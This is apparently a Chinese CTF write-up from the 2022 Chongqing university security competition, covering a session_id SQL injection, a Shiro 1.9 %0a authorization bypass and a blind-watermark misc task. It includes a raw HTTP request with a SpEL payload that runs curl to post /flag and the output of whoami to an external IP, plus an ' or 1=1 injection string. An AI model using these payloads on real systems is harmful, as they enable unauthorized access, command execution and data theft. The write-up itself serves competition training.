2022年重庆市大学生信息安全竞赛

Web

共四道：

Web3

考点：Session_id注入

题目描述：

访问

重点关注下面：

查询语句都写出来了....................

Session_id注入

Payload: session_id=' or 1=1 -- -

easy_java

考点：

1. shiro1.9 %0a绕过权限绕过
2. spel命令执行
3. curl文件外带

首页：

根据提示shiro1.9，使用%0a绕过

POST /admin/flag%0aa HTTP/1.1
Host: 1fe71bef758cbc4b.node.nsctf.cn
Content-Length: 104
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://1fe71bef758cbc4b.node.nsctf.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://1fe71bef758cbc4b.node.nsctf.cn/admin/flag%0aa
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

spel=T(java.lang.Runtime).getRuntime().exec('curl -X POST -F xx=@/flag <ip>:8848/?r=`whoami`')

misc

Sunflower

使用binwalk工具发现一张相同的图片

联想到盲水印。使用工具BlindWaterMark解密

得出flag

本栏目推荐文章
• openpyxl模块---------------------------------------------提取身份证信息及计算年龄
• AtCoder World Tour 2022 B The Greatest Two
• 2021-2022 ICPC Northwestern European Regional Programming Contest (NWERC 2021)
• JFinal学生信息管理系统
• 【LeetCode 2701. 连续递增交易】MySQL用户变量编程得到严格递增连续子序列的开始位置，结束位置，长度等统计信息
• 初中信息奥赛模拟测试
• Qt/C++编写视频监控系统83-自定义悬浮条信息
• 多态和虚函数 [补档-2022-10-23]
• 深拷贝和浅拷贝的问题 [补档-2022-10-22]
• 软件构造大作业 综合信息管理系统

大学生 大学 信息 2022大学生 大学 信息2022 题解 数学 大学2022 大学生 大学 信息2023 私立大学 大学2022 167 字符 大学生 大学2022 生物 大学 科技 信息 国大学 信息 人才 市场 大学 大学生 国大学